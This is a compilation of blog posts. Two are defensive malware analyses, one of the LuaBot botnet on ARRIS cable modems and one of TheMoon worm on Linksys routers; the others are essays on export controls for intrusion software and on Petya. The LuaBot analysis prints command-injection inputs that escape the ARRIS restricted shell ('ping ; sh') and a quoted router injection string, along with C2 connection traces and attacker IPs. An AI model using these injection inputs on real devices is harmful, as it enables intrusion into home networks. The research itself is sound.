I received some reports that malware creators are remotely exploiting those devices in order to dump the modem's configuration and steal private certificates. Some users also reported that those certificates are being sold for bitcoin to modem cloners all around the world. The report from Malware Must Die! also points that the LuaBot is being used for flooding/DDoS attacks.


Exploit and Initial Infection

Luabot malware is part of a bigger botnet targeting embedded devices from multiple architectures. After verifying some infected systems, I noticed that most cable modems were compromised by a command injection in the restricted CLI accessible via the ARRIS Password of The Day Backdoor.

Telnet honeypots like the one from nothink.org have been logging these exploit attempts for some time. They are logging many attempts to bruteforce the username "system" and the password "ping ; sh", but they're, in fact, commands used to escape from the restricted ARRIS telnet shell.


The initial dropper is created by echoing shell commands to the terminal to create a standard ARM ELF.


I have cross compiled and uploaded a few debugging tools to my cross-utils repository, including gdbserver, strace and tcpdump. I also happen to have a vulnerable ARRIS TG862 so I can perform dynamic analysis in a controlled environment.

If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:

./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop
connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device)

The command is a simple download and exec ARMEB shellcode. The malicious IP 46.148.18.122 is known for bruteforcing SSH servers and trying to exploit Linksys router command injections in the wild. After downloading the second stage malware, the script will echo the following string:
echo -e 61\\\\\\x30ck3r

This pattern is particularly interesting because it is quite similar to the one reported by ProtectWise while Observing Large-Scale Router Exploit Attempts:
cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

The second stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules allowing remote access from very specific subnets and blocking external access to ports 8080, 80, 433, 23 and 22:


These rules block external exploit attempts to ARRIS services/backdoors, restricting access to networks controlled by the attacker.

After setting up the rules, two additional binaries were transferred/started by the attacker. The first one, .sox.rslv (889100a188a42369fd93e7010f7c654b) is a simple DNS query tool based on udns 0.4.



The other binary, .sox (4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities including SOCKS/proxy, DNS and IPv6.



Parts of the code resembles some shadowsocks-libev functionalities and there's an interesting reference to the whrq[.]net domain, which seems to be used as a dnscrypt gateway:



All these binaries are used as auxiliary tools for the LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable cable modems.

UPDATE: According to this interview with the supposed malware author, "reversers usually get it wrong and say there’s some modules for my bot, but those actually are other bots, some routers are infected with several bots at once. My bot never had any binary modules and always is one big elf file and sometimes only small <1kb size dropper"


Final Stage: LuaBot

The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled using the same Puma5 toolchain as the one I made available on my cross-utils repository.


If we use strace to perform a dynamic analysis we can see the greetings from the bot's author and the creation of a mutex (bbot_mutex_202613). Then the bot will start listening on port 11833 (TCP) and will try to contact the command and control server at  80.87.205.92.


In order to understand how the malware works, let's mix some manual and dynamic analysis. Time to analyse the binary using IDA Pro and...

Reversing stripped binaries

The binaries are stripped and IDA Pro's F.L.I.R.T. didn't recognize standard function calls for our ARMEB binary. Instead of spending hours manually reviewing the code, we can use @matalaz's diaphora diffing plugin to port all the symbols.

First, we need to export the symbols from uClibC's Puma5 toolchain. Download the prebuilt toolchain here and open the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" using IDA Pro. Choose File/Script File (Alt+F7), load diaphora.py, select a location to Export IDA Database to SQLite, mark "Export only non-IDA generated functions" and hit OK.

When it finishes, close the current IDA database and open the binary arm_puma5. Rerun the diaphora.py script and now choose a SQLite database to diff against:


After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.

Browse the "Best matches" tab, right click on the list and select "Import *all* functions" and choose not to relaunch the diffing process when it finishes. Now head to the "Partial matches" tab, delete everything with a low ratio (I removed everything below 0.8), right click in the list and select "Import all data for sub_* function":


The IDA strings window display lots of information related to the Lua scripting language. For this reason, I also cross-compiled Lua to ARMEB, loaded the "lua" binary into IDA Pro and repeated the diffing process with diaphora:


We're almost done now. If you google for some debug messages present on the code, you can find a deleted Pastebin that was cached by Google.



I downloaded the C code (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? Diffing again =)



Reversing the malware is way more legible now. There's builtin Lua interpreter and some native code related to event sockets. The list of the botnet commands is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:


The bot starts by setting up the Lua environment, unpacks the code and then forks, waiting for instructions from the Command and Control server. The malware author packed the lua source code as a GZIP blob, making the entire reversing job easier for us, as we don't have to deal with Lua Bytecode.


The blob at 0xA40B8 contains a standard GZ header with the last modified timestamp from 2016-04-18 17:35:34:


Another easy way to unpack the lua code is to attach the binary to your favorite debugger (gef, of course) and dump the process memory (heap).

First, copy gdbserver to the cable modem, run the malware (arm_puma5) and attach the debugger to the corresponding PID:
./gdbserver --multi localhost:12345 --attach 1058


Then, start gef/GDB and attach it to the running server:
gdb-multiarch -q
set architecture arm
set endian big
set follow-fork-mode child
gef-remote 192.168.100.1:12345


Lastly, list the memory regions and dump the heap:
vmmap
dump memory arm_puma5-heap.mem 0x000c3000 0x000df000


That's it, now you have the full source code from the LuaBot:


The LuaBot source code is composed of several modules:


The bot settings, including the DNS recurser and the CnC settings are hardcoded:


The code is really well documented and it includes proxy checking functions and a masscan log parser:


Bot author is seeding random with /dev/urandom (crypgtographers rejoice):


LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:


Meterpreter is so 2000's, the V7 JavaScript interpreter is named shiterpreter:


There's a catchy function named checkanus.penetrate_sucuri, on what seems to be some sort of bypass for Sucuri's Denial of Service (DDoS) Protection:



LuaBot has its own lua resolver function for DNS queries:


Most of the bot capabilities are in line with the ones described on the Malware Must Die! blogpost. It's interesting to note that the IPs from the CnC server and iptables rules don't overlap, probably because they're using different environments for different bot families (or they were simply updated).

I did not analise the remote botnet structure, but the modular approach and the interoperability of the malware indicates that there's a professional and ongoing effort.


Conclusion

The analysed malware doesn't have any persistence mechanism to survive reboots. It wouldn't try to reflash the firmware or modify volatile partitions (NVRAM for example), but the first stage payload restricts remote access to the device using custom iptables rules.

This is a quite interesting approach because they can quickly masscan the Internet and block external access to those IoT devices and selectively infect them using the final stage payloads.

On 2015, when I initially reported about the ARRIS backdoors, there were over 600.000 vulnerable ARRIS devices exposed on the Internet and 490.000 of them had telnet services enabled:
If we perform the same query nowadays (September/2016) we can see that the number of exposed devices was reduced to approximately 35.000:
I know that the media coverage and the security bulletins contributed to that, but I wonder how much of those devices were infected and had external access restricted by some sort of malware...

The high number of Linux devices with Internet-facing administrative interfaces, the use of proprietary Backdoors, the lack of firmware updates and the ease to craft IoT exploits make them easy targets for online criminals.

IoT botnets are becoming a thing: manufacturers have to start building secure and reliable products, ISPs need to start shipping updated devices/firmwares and the final user has to keep his home devices patched/secured.

We need to find better ways to detect, block and contain this new trend. Approaches like the one from SENRIO can help ISPs and Enterprises to have a better visibility of their IoT ecosystems. Large scale firmware analysis can also contribute and provide a better understanding of the security issues for those devices.


Indicators of Compromise (IOCs)

LuaBot ARMEB Binaries:
  • drop (5deb17c660de9d449675ab32048756ed)
  • .nttpd (c867d00e4ed65a4ae91ee65ee00271c7)
  • .sox (4b8c0ec8b36c6bf679b3afcc6f54442a)
  • .sox.rslv (889100a188a42369fd93e7010f7c654b)
  • .arm_puma5 (061b03f8911c41ad18f417223840bce0)

GCC Toolchains:
  • GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4
  • GCC: (GNU) 4.2.0 TI-Puma5 20100224

Dropper and CnC IPs:
  • 46.148.18.122
  • 80.87.205.92

IP Ranges whitelisted by the Attacker:
  • 46.148.18.0/24
  • 185.56.30.0/24
  • 217.79.182.0/24
  • 85.114.135.0/24
  • 95.213.143.0/24
  • 185.53.8.0/24


          Analyzing Malware for Embedded Devices: TheMoon Worm   
All the media outlets are reporting that Embedded Malware is becoming mainstream. This is something totally new and we never heard of this before, right? The high number of Linux SOHO routers with Internet-facing administrative interfaces, the lack of firmware updates and the ease to craft exploits make them a perfect target for online criminals. The Internet of Threats is wildly insecure, but definitely not unpatchable.

To all infosec people out there, it's important to understand these threats and report it properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence, no malware samples, no IOC's and did not write a Hakin9 article describing it.

Refrigerator Botnet? Revd. Pastor Laphroaig says Show the PoC || GTFO

The aim for this post is to provide more information to identify/execute embedded binaries, describing how to set your own virtual lab. In case you missed it, head to the first post from the "Analyzing and Running binaries from Firmware Images" series.

TheMoon Worm

Johannes from SANS provided me a sample from "TheMoon" malware and posted some interesting information on their handler's diary. Their honeypots captured the scanning activity and linked the exploit to a vulnerable CGI script running on specific firmwares from the following Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000,E900.

SANS handlers classified TheMoon as a Worm because of the self-replicating nature of the malware. The worm searches for a "HNAP1" URL to fingerprint and identify potentially vulnerable routers. If you check your FW and Server logs you may find lot's of different IP's probing this URL.

The worm was named like this because it contains images from the movie "The Moon". It's possible to carve a few PNG's inside the ELF binary:


Identifying the Binary

A total of seven different samples were provided: they all seem to be variants from the same malware due to the ssdeep matching score.


Let's start by running the file utility and readelf to identify the architecture (MIPS R3000 / Little Endian):


The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a VirusTotal Detection Rate of 3 / 50 on 2014-02-16.



QEMU

We'll be using QEMU to run the binaries on a controlled environment. I commonly use two different setups to run MIPS Linux binaries, both based on the Malta platform.

OpenWRT MIPS

OpenWRT Malta CoreLV platform is intended to be used with QEMU (in big or little endian mode). The install procedure is pretty straightforward using OpenWRT Buildroot. OpenWrt Buildroot is the buildsystem for the distribution and it works on Linux, BSD or MacOSX. In case you didn't remember, authors from Carna Botnet used it to cross-compile its binaries.

Installing prerequisites (on your favorite Debian Derivative):

Now head to the openwrt folder and set the proper settings for your Linux Kernel, choosing "MIPS Malta CoreLV board (qemu)" for the Target System and "Little Endian" for the subtarget. Don't forget to save the config.




Now build your image (use the -j switch to speed up if you have multiple cores, e.g "-j 3"):



Your image will be ready after a couple of minutes. Now you need to install QEMU full system emulation binaries and start it with the right command switches:


To exit the console simply hit CTRL+A followed by C and Q.

If you want to connect your emulated machined to a real network, follow the steps from Aurelien's Blog or simply run the following commands to get Internet access:

If you don't want to compile the Kernel by yourself, you can grab the pre-compiled binaries from here or here (at your own risk).

You may remember that it was not possible to run busybox-simet using the standalone qemu-mips-static. It's possible to fix that by manually patching QEMU or you can run it inside the proper virtual machine (OpenWRT Malta MIPS/Big Endian):


Debian MIPS Linux

I won't describe how to set up your Debian MIPS Linux because Zach Cutlip already did an amazing job describing it on this blog post. The process is quite similar to the OpenWRT one and if you're too lazy to build your own environment, Aurelien provides pre-compiled binaries here. Don't forget to set you network connections properly

Dynamic Analysis

In order to emulate the Linksys Environment, let's download and unpack the Firmware from E2500v2 (v1.0.07).

Let's copy and extract the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to copy the worm to the appropriate "/tmp" folder. Backup your QEMU image, start sniffing the connections from the bridged network (tap1 on my case) and bind the necessary pseudo-devices to the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot and the target filesystem is highly recommended. If you try to chroot and run the worm without linking these devices, it will refuse to run and it won't drop the second stage binary.

You can use strace to log the syscalls and start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS Kernel (vmlinux-2.6.32-5-4kc-malta). The 3.2.0  (vmlinux-3.2.0-4-4kc-malta) version seems to be running fine.



If you don't want to use strace, simply start sh chrooted and run the malware:


The worm tries to remove files containing certain extensions and perform a series of system checks. After a few seconds the binary is removed from /tmp/ and three files are written on the disk: .L26 (PID), .L26.lunar (Lunar Base URL) and .L26.out (Debug log).


It's possible to dump QEMU's physical memory using the pmemsave command by hitting CTRL+A, C (to enter QEMU's administrative interface) and entering:



The 256MB raw dump will be saved on your host's local path. You can now try to use volatility or run strings against it.



The worm starts scanning for ports 80 and 8080 on a hardcoded list of networks. If the /HNAP/ URL returns a string identifying the targeted routers, the malware sends a HTTP POST trying to exploit a command injection on the vulnerable CGI.





Decoded POST:


TheMoon will also start an HTTPS server ("Lunar Base") on the router using the random port identified on the .L26.lunar file. The certificate's Common Name, Organization and Organizational Unit are hardcoded and other values seem to be random. Trying to find these entries on scans.io SSL certificates datasets would be really interesting.


The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico:




Rkhunter reports a few warnings on the infected system. I have upload the complete output from rkhunter to Pastebin, get it here.


Another useful technique is to compare the contents from the filesystem with a known good template. You can use binwally, WinMerge or binwalk's hashmatch.




Conclusion

I did not spend much time reversing the files and its functions as the main purpose of this post was to provide information to identify and execute embedded binaries, describing how to set your own virtual lab using QEMU.

It's still possible to improve the analysis by faking the nvram, by running a GDB server with QEMU or using Volatility with the proper profile and debugging structures, but this post is already way too long. You should also have a look on Avatar, from EURECOM. Avatar's goal is to enable complex dynamic analysis of embedded firmware in order to assist in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.

Let's keep drawing public awareness on the security issues of the Internet of Threats, persuading manufactures, ISP's and final users to collaborate to address these problems.




          Hittat, länkat, kommenterat – February 9, 2014   
Corporate Viral Advertising Zombie Botnets Need a Shovel to the Head — Medium: Kanske det dummaste reklamförsöket på Twitter någonsin. Använda spam för att likna en zombieattack mot profilerade twitteranvändare. Vem skulle kunna tänkas ens bli glad av en sådan grej? Mittmedia börjar trycka dagtid | Medievärlden: Så har då tidningsdöden kommit på riktigt i […]
          ZombieCoin – Using Bitcoin’s Network To Create Next Generation Botnets   

A botnet represents a network of a large number of compromised machines, which are distinctively referred to as bots or zombies, and are remotely controlled by the “botmaster”. Botnets were originally coded to act as means for vandalism and to “show off” hacking skills, yet they have presently evolved into sophisticated tools that are continuously ...

The post ZombieCoin – Using Bitcoin’s Network To Create Next Generation Botnets appeared first on Deep Dot Web.


          Proposed Changes in Export Control   

The U.S. limits the export of certain high-tech items that might be used inappropriately (from the government’s point of view). This is intended to prevent (or slow) the spread of technologies that could be used in weapons, used in hostile intelligence operations, or used against a population in violation of their rights. Some are obvious, such as nuclear weapons technology and armor piercing shells. Others are clear after some thought, such as missile guidance software and hardware, and stealth coatings. Some are not immediately clear at all, and may have some benign civilian uses too, such as supercomputers, some lasers, and certain kinds of metal alloys.

Recently, there have been some proposed changes to the export regulations for some computing-related items. In what follows, I will provide my best understanding of both the regulations and the proposed changes. This was produced with the help of one of the professional staff at Purdue who works in this area, and also a few people in USACM who provided comments (I haven’t gotten permission to use their names, so they’re anonymous for now). I am not an expert in this area so please do not use this to make important decisions about what is covered or what you can send outside the country! If you see something in what follows that is in error, please let me know so I can correct it. If you think you might have an export issue under this, consult with an appropriate subject matter expert.

Export Control

Some export restrictions are determined, in a general way, as part of treaties (e.g., nuclear non-proliferation). A large number are as part of the Wassenaar Arrangement — a multinational effort by 41 countries generally considered to be allies of the US, including most of NATO; a few major countries such as China are not, nor are nominal allies such as Pakistan and Saudi Arabia (to name a few). The Wassenaar group meets regularly to review technology and determine restrictions, and it is up to the member states to pass rules or legislation for themselves. The intent is to help promote international stability and safety, although countries not within Wassenaar might not view it that way.

In the U.S., there are two primary regulatory regimes for exports: ITAR and EAR. ITAR is the International Traffic in Arms Regulations in the Directorate of Defense Trade Controls at the Department of State. ITAR provides restrictions on sale and export of items of primary (or sole) use in military and intelligence operations. The EAR is the Export Administration Regulations in the Bureau of Industry and Security at the Department of Commerce. EAR rules generally cover items that have “dual use” — both military and civilian uses.

These are extremely large, dense, and difficult to understand sets of rules. I had one friend label these as “clear as mud.” After going through them for many hours, I am convinced that mud is clearer!

Items designed explicitly for civilian applications without consideration to military use, or with known dual-use characteristics, are not subject to the ITAR because dual-use and commodity items are explicitly exempted from ITAR rules (see sections 121.1(d) and 120.41(b) of the ITAR). However, being exempt from ITAR does not make an item exempt from the EAR!

If any entity in the US — company, university, or individual — wishes to export an item that is covered under one of these two regimes, that entity must obtain an export license from the appropriate office. The license will specify what can be exported, to what countries, and when. Any export of a controlled item without a license is a violation of Federal law, with potentially severe consequences. What constitutes an export is broader than some people may realize, including:

  • Shipping something outside the U.S. as a sale or gift is an export, even if only a single instance is sent.
  • Sending something outside the U.S. under license, knowing (or suspecting) it will then be sent to a 3rd location is a violation.
  • Providing a controlled item to a foreign-controlled company or organization even if in the U.S. may be an export.
  • Providing keys or passwords that would allow transfer of controlled information or materials to a foreign national is an export
  • Designing or including a controlled item in something that is not controlled, or which separately has a license, and exporting that may be a violation.
  • Giving a non-U.S. person (someone not a citizen or permanent resident) access to an item to examine or use may be an export.
  • Providing software, drawings, pictures, or data on the Internet, on a DVD, on a USB stick, etc to a non-U.S. person may be an export

Those last two items are what as known as a deemed export because the item didn’t leave the U.S., but information about it is given to a non-US person. There are many other special cases of export, and nuances (giving control of a spacecraft to a foreign national is prohibited, for example, as are certain forms of reexport). This is all separate from disclosure of classified materials, although if you really want trouble, you can do both at the same time!

This whole export thing may seem a bit extreme or silly, especially when you look at the items involved, but it isn’t — economic and military espionage to get this kind of material and information is a big problem, even at research labs and universities. Countries that don’t have the latest and greatest factories, labs, and know-how are at a disadvantage both militarily and economically. For instance, a country (.e.g, Iran) that doesn’t have advanced metallurgy and machining may not be able to make specialized items (e.g., the centrifuges to separate fissionable uranium), so they will attempt to steal or smuggle the technology they need. The next best approach is to get whatever knowledge is needed to recreate the expertise locally. You only need to look at the news over a period of a few months to see many stories of economic theft and espionage, as well as state-sponsored incidents.

This brings us to the computing side of things. High speed computers, advanced software packages, cryptography, and other items all have benign commercial uses. However, they all also have military and intelligence uses. High speed computers can be used in weapons guidance and design systems, advanced software packages can be used to model and refine nuclear weapons and stealth vehicles, and cryptography can be used to hide communications and data. As such, there are EAR restriction on many of these items. However, because the technology is so ubiquitous and the economic benefit to the U.S. is so significant, the restrictions have been fairly reasonable to date for most items.

Exemptions

Software is a particularly unusual item to regulate. The norm in the community (for much of the world) is to share algorithms and software. By its nature, huge amounts of software can be copied onto small artifacts and taken across the border, or published on an Internet archive. In universities we regularly give students from around the world access to advanced software, and we teach software engineering and cryptography in our classes. Restriction on these kinds of items would be difficult to enforce, and in some cases, simply silly to restrict.

Thus, the BIS export rules contain a number of exemptions that remove some items from control entirely. (In the following, designations such as 5D002 refer to classes of items as specified in the EAR, and 734.8 refers to section 734 paragraph 8.)

  • EAR 734.3(b.3) exempts technology except software classified under 5D002 (primarily cryptography) if it is
    • arising from fundamental research (described in 734.8), or
    • is already published or will be published (described in 734.7), or
    • is educational information (described in 734.9).
    Exempt from 5D002 is any printed source code, including encryption code, or object code whose corresponding source code is otherwise exempt. See also my note below about 740.13(e.3).
  • EAR 734.7 defines publication as appearing in books, journals, or any media that is available for free or at a price not to exceed the cost of distribution; or freely available in libraries; or released at an open gathering conference, meeting, or seminar open to the qualified public; or otherwise made available,
  • EAR 734.8 defines fundamental research that is ordinarily published in the course of that research.
  • EAR 734.9 defines educational information (which is excluded from the EAR) as information that is released by instruction in catalog courses and associated teaching laboratories of academic institutions. This provision applies to all information, software or technology except certain encryption software, but if the source code of encryption software is publicly available as described in 740.13(e), it can also be considered educational information.
  • We still have some deemed export issues if we are doing research that doesn’t meet the definition of fundamental research (e.g. because it requires signing an NDA or there is a publication restriction in the agreement) and a researcher or recipient involved is not a US person (citizen or permanent resident) employed full time by the university, and with a permanent residence in the US, and is not a national of a D:5 country (Afghanistan, Belarus, Burma, the CAR, China (PRC), the DRC, Core d’Ivorie, Cuba, Cyprus, Eritrea, Fiji (!), Haiti, Iran, Iraq, DPRK, Lebanon, Liberia, Libya, Somalia, Sri Lanka, Sudan, Syria, Venezuela, Vietnam, Zimbabwe). However, that is easily flagged by contracts officers and should be the norm at most universities or large institutions with a contracts office.
  • EAR 740.13(d) exempts certain mass-market software that is sold retail and installed by end-users so long as it does not contain cryptography with keys longer than 64 bits.

The exemption for publication is interesting. Anyone doing research on controlled items appears to have an exemption under EAR 740.13(e) where they can publish (including posting on the Internet) the source code from research that falls under ECCN 5D002 (typically, cryptography) without restriction, but must notify BIS and NSA of digital publication (email is fine, see 740.13(e.3)); there is no restriction or notification requirement for non-digital print. What is not included is any publication or export (including deemed export) of cryptographic devices or object code not otherwise exempt (object code whose corresponding source code is exempt is itself exempt), or for knowing export to one of the prohibited countries (E:1 from supplement 1 of section 740 — Cuba, Iran, DPRK, Sudan and Syria, although Cuba may have just been removed.)

As part of an effort to harmonize the EAR and ITAR, a proposed revision to both has been published on June 3 (80 FR 31505) that has a nice side-by-side chart of some of these exemptions, along with some small suggested changes.

Changes

The Wassenaar group agreed to some changes in December 2013 to include intrusion software and network monitoring items of certain kinds on their export control lists. The E.U. adopted new rules in support of this in October of 2014. On May 20, 2015, the Department of Commerce published — in the Federal Register (80 FR 28853) — a request for comments on its proposed rule to amend the EAR. Specifically, the notice stated:

The Bureau of Industry and Security (BIS) proposes to implement the agreements by the Wassenaar Arrangement (WA) at the Plenary meeting in December 2013 with regard to systems, equipment or components specially designed for the generation, operation or delivery of, or communication with, intrusion software; software specially designed or modified for the development or production of such systems, equipment or components; software specially designed for the generation, operation or delivery of, or communication with, intrusion software; technology required for the development of intrusion software; Internet Protocol (IP) network communications surveillance systems or equipment and test, inspection, production equipment, specially designed components therefor, and development and production software and technology therefor. BIS proposes a license requirement for the export, reexport, or transfer (in-country) of these cybersecurity items to all destinations, except Canada. Although these cybersecurity capabilities were not previously designated for export control, many of these items have been controlled for their "information security" functionality, including encryption and cryptanalysis. This rule thus continues applicable Encryption Items (EI) registration and review requirements, while setting forth proposed license review policies and special submission requirements to address the new cybersecurity controls, including submission of a letter of explanation with regard to the technical capabilities of the cybersecurity items. BIS also proposes to add the definition of "intrusion software" to the definition section of the EAR pursuant to the WA 2013 agreements. The comments are due Monday, July 20, 2015.

The actual modifications are considerably more involved than the above paragraph, and you should read the Federal Register notice to see the details.

This proposed change has caused some concern in the computing community, perhaps because the EAR and ITAR are so difficult to understand, and because of the recent pronouncements by the FBI seeking to mandate “back doors” into communications and computing.

The genesis of the proposed changes is stated to match the Wassenaar additions of (basically) methods of building, controlling, and inserting intrusion software; technologies related to the production of intrusion software; technology for IP network analysis and surveillance, or for the development and testing of same. These are changes to support national security, regional stability, and counter terrorism.

According to the notice, intrusion software includes items that are intended to avoid detection or defeat countermeasures such as address randomization and sandboxing, and exfiltrate data or change execution paths to provide for execution of externally provided instructions. Debuggers, hypervisors, reverse engineering, and other software tools are exempted. Software and technology designed or specially modified for the development, generation, operation, delivery, or communication with intrusion software is controlled — not the intrusion software itself. It is explicitly stated that rootkits and zero-day exploits will presumptively be denied licenses for export.

The proposed changes for networking equipment/systems would require that it have all 5 of the following characteristics to become a controlled item:

  1. It operates on a carrier class IP network (e.g., national grade backbone)
  2. Performs analysis at OSI layer 7
  3. Extracts metadata and content and indexes what it extracts
  4. Executes searches based on hard selectors (e.g., name, address)
  5. Performs mapping of relational networks among people or groups

Equipment specially designed for QoS, QoE, or marketing is exempt from this classification.

Two other proposed changes would remove the 740.13(d) exemption for mass-market products, and would make software controlled by one of these new sections and containing encryption would now be dual-listed in two categories. There are other changes for wording, cleaning up typos, and so on.

I don’t believe there are corresponding changes to ITAR because these all naturally fall under the EAR.

Discussion

Although social media has had a number of people posting vitriol and warnings of the impending Apocalypse, I can’t see it in this change. If anything, this could be a good thing — people who are distributing tools to build viruses, botnets, rootkits and the like may now be prosecuted. The firms selling network monitoring equipment that is being used to oppress political and religious protesters in various countries may now be restrained. The changes won’t harm legitimate research and teaching, because the exemptions I listed above will still apply in those cases. There are no new restrictions on defensive tools. There are no new restrictions on cryptography.

Companies and individuals making software or hardware that will fall under these new rules will now have to go through the process of applying for export licenses, It may also be the case those entities may find their markets reduced. I suspect that it is a small population that will be subject to such a restriction, and for some of them, given their histories, I’m not at all bothered by the idea.

I have seen some analyses that claim that software to jailbreak cellphones might now be controlled. However, if published online without fee (as is often the case), it would be exempt under 734.7. It arguably is a debugging tool, which is also exempt.

I have also seen claims that any technology for patching would fall under these new rules. Legitimate patching doesn’t seek to avoid detection or defeat countermeasures, which are specifically defined as “techniques designed to ensure the safe exertion of code.” Thus, legitimate patching won’t fall within the scope of control.

Jennifer Granick wrote a nice post about the changes. She rhetorically asked at the end whether data loss prevention tools would fall under this new rule. I don’t see how — those tools don’t operate on national grade backbones or index the data they extract. She also posed a question about whether this might hinder research into security vulnerabilities. Given that fundamental research is still exempt under 734.8 as are published results under 734.7, I don’t see the same worry.

The EFF also posted about the proposed rule changes, with some strong statements against them. Again, the concern they stated is about researchers and the tools they use. As I read the EAR and the proposed rule, this is not an issue if the source code for any tools that are exported is published, as per 734.7. The only concern would if the tools were exported and the source code was not publicly available, i.e., private tools exported. I have no idea how often this happens; in my experience, either the tools are published or else they aren’t shared at all, and neither case runs afoul of the rule. The EFF post also tosses up fuzzing, vulnerability reporting, and jailbreaking as possible problems. Fuzzing tools might possibly be a problem under a strict interpretation of the rules, but the research and publication exemptions would seem to come to the rescue. Jailbreaing I addressed, above. I don’t see how reporting vulnerabilities would be export of technology or software for building or controlling intrusion software, so maybe I don’t understand the point.

At first I was concerned about how this rule might affect research at the university, or the work at companies I know about. As I have gotten further into it, I am less and less worried. it seems that there are very reasonable exceptions in place, and I have yet to see a good example of something we might legitimately want to do that would now be prohibited under these rules.

However, your own reading of the proposed rule changes may differ from mine. If so, note the difference in comment to this essay and I’ll either respond privately or post your comment. Of course, commenting here won’t affect the rule! If you want to do that, you should use the formal comment mechanism listed in the Federal Register notice, on or before July 20, 2015.




Update July 17: The BIS has an (evolving) FAQ on the changes posted online. It makes clear the exemptions I described, above. The regulations only cover tools specially designed to design, install, or communicate with intrusion software as they define it. Sharing of vulnerabilities and proof of exploits is not regulated. Disclosing vulnerabilities is not regulated so long as the sharing does not include tools or technologies to install or operate the exploits.

As per the two blog posts I cite above

  • research into security vulnerabilities is explicitly exempt so long as it is simply the research
  • export of vulnerability toolkits and intrusion software would be regulated if those tools are not public domain
  • fuzzing is explicitly listed as exempt because it is not specifically for building intrusion software
  • jailbreaking is exempt, as is publicly available tools for jailbreaking. Tools to make jrailbreaks would likely be regulated.

Look at the FAQ for more detail.


          Twitter transformed into botnet command channel    
For the past couple weeks, Twitter has come under attacks that besieged it with more traffic than it could handle. Now comes evidence that the microblogging website is being used to feed the very types of infected machines that took it out of commission.
          Raph's Website: The Internet as existential threat   

Some days I wonder if we are completely screwed. So today’s post is a perhaps slightly hysterical outburst.

The news is not paying enough attention to the Petya/NotPetya ransomware, and the effects it is having on the Ukraine and on a bunch of businesses worldwide. I think it may be a harbinger of how the Internet could kill us all.

Based on what little I have read so far… A piece of widely used tax software — one used by the Ukrainian government — did its usual “phone home” to check for updates. Instead of getting back a few hundred bytes of acknowledgement, it got a viral payload. Basically, this tax software served as a means of auto-updating the virus to thousands of targets. The result is not just accounting systems down, though. It’s gas stations and point of sale systems in grocery stores.

This kind of thing basically makes me wonder how long we’ll have the Internet.

The whole premise of the Internet is the connecting of disparate networks. It started out by only connecting computer networks. But today it connects networks of vastly different sorts: computers, yes, but also financial networks, distribution networks, road networks, water networks, power networks, communication networks, social networks. It truly is “Inter” now.

As we rush towards putting more and more things “in the cloud,” as we rush towards an Internet of Things with no governance beyond profit motive and anarchy, what we’re effectively doing is creating a massive single point of failure for every system we put in it.

Think of a house with an alarm system on the doors, and a phone system, and power coming into the house, and water pipes, and so on. In your house these are probably all separate connections to separate networks. If the water stops running, you don’t tend to think that your phone will go down too. But you know that cutting the power at the mains renders the house vulnerable in a host of ways, because so many things do connect to the electricity.

Well, even without going so far as to buy Internet-enabled juicers, quite a lot of that stuff actually has been connected to one point of failure, and it’s not necessarily all things we term “critical infrastructure.”

What we are building is basically a perfect scenario for collapse, where a commons is consumed by actors who either don’t care or don’t understand the collective damage that is possible in a connected system, and the tipping points that can ensue.

Most networks we come across in the real world follow power-law distributions, and are what we term “scale-free networks.” Basically, this is where most nodes on the network aren’t that important, but there’s a preferential attachment thing going on, where some nodes are super-connectors. They’re really hard to destroy; you have to take out the biggest nodes, all at once. But if a power-law network is co-opted, you have a real problem. The Internet is basically our biggest node now.

Most of the big virus scares lately have been traced in one way or another back to state actors; Petya is based on an exploit the NSA kept secret, that was then leaked to the general public, and weaponized by hackers. As huge as their effects have been, consider that this implies fairly limited use. But picture a world where these tools of state actors are actually in the hands of random people, and released at the frequencies that random people would engage in. I remember being in South Korea in the mid-2000s, and watching a colleague’s laptop get owned instantly just from connecting to hotel wifi without firewalls up. Within ten seconds, the laptop was completely useless, locked up, conquered totally. Picture an Internet like that. In such a world, the only people who can connect would be the ones with the wherewithal to do so, the money and the savvy and the ability to actually harden security.

But just as critically, governments and state actors seem to be the source of so many of the problems precisely because the Internet is now too many forms of critical infrastructure, and therefore too juicy a target. If software eats everything, then the ability to kill software is the ability to kill anything. Net connectivity becomes the single point of failure for every system connected to it.

Even if the Net itself is designed to route around damage, that doesn’t help if it is the single vector of attack that can take down any given target. It’s too juicy a target for the military, too juicy a target for terror, too juicy a target for criminal ransom.

The old adage goes “when they came for this, I said nothing. When they came for that…” — we all know it. Consider that the more we hand gleefully over to the cloud because we want convenience, big data, personalization, and on, we’re creating a single thing that can be taken from us in an instant. We’ve decided to subscribe to everything, instead of owning it. When they came for your MP3s, your DVDs, fine,. not “critical infrastructure.” When they came for your resumes, OK, getting closer.

